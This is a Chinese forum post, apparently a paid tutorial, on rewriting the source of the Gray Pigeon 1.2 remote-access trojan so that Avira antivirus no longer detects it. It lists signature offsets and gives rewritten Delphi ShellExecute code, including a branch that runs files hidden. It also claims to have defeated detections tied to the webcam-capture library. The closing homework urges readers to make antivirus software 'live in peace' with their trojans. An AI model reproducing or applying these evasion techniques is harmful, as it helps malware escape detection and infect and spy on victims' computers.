|
发表于 2010-2-28 12:29:38
|显示全部楼层
【教程题目】第九讲:重写灰鸽子1.2被杀源码免杀德国小红伞高启发篇
【教程目的】 重写被杀代码
【教程说明】由于有会员提意见:我是删代码。加上也是最后第二节课了,所
以我讲点深一点的了, 新手可能会看不懂,多看几遍吧!
【教程工具】delphi 7.0,灰鸽子V1.2源代码
【编译环境】windowsXP SP3
【教程计划】
============================================================
分析:小红伞和NOD32是国外两个比较BT的启发杀软,都是喜欢杀在输入表
的两大杀软魔头!
特征码:
------------------------------------------------
特征码 物理地址/物理长度 如下:
[特征] 000BA94A_00000002
[特征] 000BABBC_00000002
[特征] 000CDE8C_00000002
杀的源码地方:
杀在了ShellExecuteA 就是运行文件的一个函数
重写代码如下:
if StrTmpList.Count=3 then
case Strtoint(StrTmpList[2]) of
0:ShellExecute(0, nil, pchar(Path1), nil, nil, SW_NORMAL);
1:ShellExecute(0, nil, pchar(Path1), nil, nil, SW_HIDE);
2:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_MAXIMIZE);
3:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_MINIMIZE);
end
else case Strtoint(StrTmpList[2]) of
0:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_NORMAL);
1:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_HIDE);
2:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_MAXIMIZE);
3:ShellExecute(0, nil, pchar(Path1),pchar(Path2), nil, SW_MINIMIZE);
end;
好了,修改完毕!还有处杀在了AVICAP32.DLL的2处,我暗笑了,小红伞也
玩起了这个把戏!看我对付它!
OK,搞定了!!!!小红伞哑巴了。。。
——————————————————————————————————
教程附加:一招搞定小红伞! 看演示吧!
——————————————————————————————————
好了,搞定了吧,教程结束,大家再见!
============================================================
【课后作业】
思考加实践!让杀毒软件和你的木马和平相处吧!!
甲壳虫免杀VIP教程 vip.jksing.com |
|